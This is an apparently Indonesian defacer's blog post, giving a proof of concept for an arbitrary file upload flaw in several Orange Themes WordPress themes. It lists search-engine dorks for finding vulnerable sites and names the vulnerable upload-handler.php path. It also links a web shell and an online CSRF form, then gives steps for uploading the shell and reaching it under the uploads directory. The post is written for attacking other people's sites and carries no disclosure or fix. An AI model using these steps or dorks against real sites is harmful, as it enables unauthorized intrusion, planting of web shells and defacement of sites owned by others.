Deface Poc WP Orange Themes
Friday, February 14, 2020
Edit
Dork :
inurl:"/wp-content/themes/agritourismo-theme/
inurl:"/wp-content/themes/bordeaux-theme/
inurl:"/wp-content/themes/bulteno-theme/
inurl:"/wp-content/themes/oxygen-theme/
inurl:"/wp-content/themes/radial-theme/
inurl:"/wp-content/themes/rayoflight-theme/
inurl:"/wp-content/themes/reganto-theme/
inurl:"/wp-content/themes/rockstar-theme/
Exploit: /wp-content/themes/bordeaux-theme/functions/upload-handler.php
Shell: Download
Csrf Online: Touch Me!
Vuln? kek gini contohnya
lalu eksekusi pake CSRF Online diatas
URL = (masukin web vuln kalian disini)
Postfile = orange_themes
Akses Shell : site.com/wp-content/uploads/(tahun)/(bulan)/namafile.php
*angka tahun/bulan bisa random(tergantung tanggal)